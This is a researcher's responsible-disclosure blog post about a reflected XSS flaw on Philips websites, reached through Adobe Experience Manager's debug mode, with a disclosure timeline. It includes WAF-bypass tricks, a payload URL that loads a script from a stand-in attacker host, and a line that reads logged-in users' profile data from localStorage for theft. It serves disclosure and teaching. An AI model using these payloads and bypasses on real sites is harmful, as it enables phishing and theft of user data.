Reflected XSS at Philips.com
Are you aware of any (private) bug bounty programs? I would love to get an invite. Please get in touch with me: Jonathan@Protozoan.nl
As always, we need to find a proper target for our attack. What about Philips? This year they won an award for being “The most reputable company in the Netherlands”. Customers trust their brand and this makes them a high profile target for phishers.
Reconnaissance, finding attack vectors
Where do we start if we want to find a XSS bug? No strict rules. I always start with Aquatone in order to discover interesting subdomains, see this report for details. After that I start Burp Suite, see this report, and I start looking around for bugs!
While clicking around the website, Burp Suite captures all the requests and responses. Burp Suite has a nice feature that creates a site map out of this data. This gives us a quick insight in how the website is structured, it also allows us to easily repeat specific requests and check if a page is vulnerable to XSS attacks.
Another important thing is to check if we are able to add HTML data to the website that persists in some database; a stored XSS.
Long story short, after a few hours of trying I did not find any reflective or stored attack vectors. I probed all the different parameters in the URLs captured by the Burp Suite; all of them were properly escaped. Good job Philips :-).
Below you see an example of a manipulated request that tries to inject
<h1>Hi mom</h1> into the page. It got escaped into
<h1>Hi+mom</h1> so the browser won’t try to render it as HTML, just as plain text.
What to do now? Find holes in the server framework itself!
To discover which framework is being used by Philips we may use tools like WhatCMS.org. They have created an algorithm that is able to detect 320 different CMS systems; perfect!
Another way to discover the name of the framework is by taking a closer look at the source code of the main page:
Now we know that Adobe Experience Manager (AEM) is used we should start reading as much as possible about this CMS. This gives us some feeling of where to look for the weak spots; what are the best practices, any security updates in the past and are there any hidden functions?
Adobe Experience Manager
Reading software documentation is a necessity, sometimes boring but often rewarding. Another thing you should always try is to just google on the software and look for blogs or other places where experts share their tricks.
We discover something interesting if we do a quick google search for URL parameters.
What happens if we visit Philips their website with the
Does the debug mode renders our URL in the page, unescaped?
Bypassing the Web Application Firewall (WAF)
So we have our point of injection, the URL path combined with the
Identify the WAF
A quick way to indentify the WAF(s) used by a target is to use WhatWaf. It probes the target with some payloads and compares the outcome with a set of detection rules.
The used WAF is ModSecurity and AkamaiGHost.
Bypass ModSecurity and AkamaiGHost
This is something I prefer to do by hand. Brute forcing it with the Burp Suite Intruder is possible, but hammering a server with plenty of requests is a bad idea; you will end up on some blacklist.
While drinking a good cup of tea we discover that:
1. The WAF blocks the
2. The WAF allows the
onmouseout), but allows the use of the
4. The WAF blocks the string
https:// in the path
I always check if jQuery is loaded on the page; it allows us to create a smaller payload that works crossbrowser (by using the getScript function).
Now it’s time to construct our payload:
https://www.philips.nl/healthcare/<body onpointerenter="jQuery.getScript('https:/' +'/attackerserver.ltd/philips/inject.js')">?debug=layout
'https:/' +'/attackerserver.ltd' in order to bypass the WAF
https:// string filter.
We urlencode the payload in order to be sure that the link is valid and easy to send to our victim.
Creating a proper proof of concept
Everyone knows the
<script>alert('XSS')</script> payload as a proof of concept. However we will invest a few more minutes in making a more impressive proof of concept; a fully working phishing login.
This is a better way to show the impact to people, everyone understands the impact if they see a fake login screen.
Bonus: Stealing user details from logged in users
Philips uses Janrain for their customer login. Janrain stores the user details in the localstorage of the browser. So we are able to steal the visitor details if one is logged in.
var user = (localStorage.getItem("janrainCaptureProfileData")) ? localStorage.getItem("janrainCaptureProfileData") : "Not logged in";
Proof of concept in action
Bypassing initial fix
The initial fix of Philips was to add a new firewall rule that blocks all the HTML tags. Leaving the debug mode on. However we are able to inject a HTML tag that is missing the
The server will inject the payload and as you can see the
> from the
<br> tag will be used to close the
body tag. Another nifty trick to bypass a WAF rule that blocks
alert() strings: split the string into 2 pieces and add them as attributes to the HTML tag and merge them again in the same tag by using
- The most simple solution is to disable the debug mode; this can be done by configuring the dispatcher used by AEM.
- The WAF may be improved to disable any the HTML tags in the url or onevent strings, however blacklisting is never a good solution; we will always find a new payload that bypasses the blacklist.
Impact of the attack
- Extra filtration of user information visiting our prepared link
- Attack the browser of visitors through injection of a framework like beefproject.com
- Setting up a phishing login
Hall of Honors
13–07–18 Discovered bug, informed Philips by email
17–07–18 Asked Philips on Facebook Messenger if they received the report
17–07–18 Philips replied email that they received the report
17–07–18 Requested Philips to share the findings with the lighting.philips.com development team, this site is also vulnerable (Signify is the owner of Lighting Philips, a separate company. They share the Philips.com code base but have their own deployment and dev team).
26–07–18 Requested Philips for update, check if they informed Signify
30–07–18 Philips informs me that they deployed a fix on their own site, want to mention me in the Halls of Honors. No answer on Signify question.
30–07–18 Informed Philips that their fix (WAF rule) is not enough, debug mode still possible.
31–07–18 Created new payload that bypasses the new WAF rule, informed Philips.
18–08–18 Requested update; Philips.com looks fixed (no debug mode anymore), lightning.philips.com still vulnerable to both payloads
27–08–18 Requested update from Philips again, no response.
27–08–18 Requested email address of Signify IT Security Manager from a personal contact working at Signify/Philips Lighting. Informed Signify IT Security Manager by email.
28–08–18 Signify confirmed the bug
29–08–18 Philips informed me that they sent the report to the Lighting division but did not receive any response.
06–09–18 Wrote this report, requested update from Signify
07–09–18 Signify informed me that they are busy with the fix
13–09–18 Signify informed me that the fix is deployed, I confirmed the fix, requested to disclose on 17–09–18
16–09–18 Philips informed me that they have no remarks
17–09–18 Published this blog.